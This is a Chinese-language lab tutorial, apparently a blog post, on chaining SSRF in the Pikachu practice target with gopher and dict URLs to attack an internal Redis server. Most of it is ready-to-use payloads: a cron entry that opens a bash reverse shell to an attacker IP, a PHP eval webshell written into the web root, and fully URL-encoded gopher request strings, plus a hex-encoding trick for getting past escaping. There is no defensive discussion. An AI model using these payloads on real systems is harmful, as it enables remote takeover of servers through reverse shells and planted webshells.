SSRF漏洞拓展目录
- SSRF漏洞拓展
- curl_exec函数
- 一、ssrf配合gopher协议反弹shell
- 二、ssrf配合gopher协议写马
- 三、ssrf配合gopher协议ssh免密登录
- 四、ssrf配合dict协议反弹shell
- curl_exec函数
curl_exec函数一、ssrf配合gopher协议反弹shell
实验环境:
(1)192.168.142.201 #redis服务器(2)192.168.142.133 #攻击机(3)192.168.142.1 #SSRF靶机
1、利用定时任务构造反弹shell
set xx "\n* * * * * bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n"config set dir /var/spool/cronconfig set dbfilename rootsave
2、进行URL编码
%73%65%74%20%78%78%20%22%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%34%32%2e%31%33%33%2f%38%38%38%38%20%30%3e%26%31%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%72%6f%6f%74%0a%73%61%76%65
3、然后把%0a换成%0d%0a,最后再加上%0d%0a,再进行一次url编码
%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
4、对参数的gopher协议进行编码
gopher://192.168.142.201:6379/_编码后:gopher%3a%2f%2f192.168.142.201%3a6379%2f_
5、拼接成最后的payload
http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%31%25%33%33%25%33%33%25%32%66%25%33%38%25%33%38%25%33%38%25%33%38%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
6、攻击机器开启监听,成功反弹
二、ssrf配合gopher协议写马
1、构造一句话木马
set xx "\n\n"config set dir /www/admin/localhost_80/wwwrootconfig set dbfilename test.phpsave
2、进行URL编码
%73%65%74%20%78%78%20%22%5c%6e%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%74%65%73%74%5d%29%3b%3f%3e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%77%77%77%2f%61%64%6d%69%6e%2f%6c%6f%63%61%6c%68%6f%73%74%5f%38%30%2f%77%77%77%72%6f%6f%74%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%74%65%73%74%2e%70%68%70%0a%73%61%76%65
3、然后把%0a换成%0d%0a,最后再加上%0d%0a,再进行一次url编码
%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
4、对参数的gopher协议进行编码
gopher://192.168.142.201:6379/_编码后:gopher%3a%2f%2f192.168.142.201%3a6379%2f_
5、拼接成最后的payload
http://192.168.142.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3a%2f%2f192.168.142.201%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%37%34%25%36%35%25%37%33%25%37%34%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%32%66%25%36%63%25%36%66%25%36%33%25%36%31%25%36%63%25%36%38%25%36%66%25%37%33%25%37%34%25%35%66%25%33%38%25%33%30%25%32%66%25%37%37%25%37%37%25%37%37%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%37%30%25%36%38%25%37%30%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
6、用webshell工具连接成功
三、ssrf配合gopher协议ssh免密登录
思路差不多。公钥编码后会特别长,就不粘贴出来了。
四、ssrf配合dict协议反弹shell
1、修改文件名为root
dict://192.168.142.201:6379/config:set:dbfilename root
2、修改存储路径为/var/spool/cron
dict://192.168.142.201:6379/config:set:dir:/var/spool/cron
3、写入反弹shell
dict://192.168.142.201:6379/set:test:"\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.142.133/8888 0>&1\n\n"如果被转义了可以尝试16进制编码dict://192.168.142.201:6379/set:test:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.142.133/8888\x200\x3e\x261\n\n"
4、保存
dict://192.168.142.201:6379/save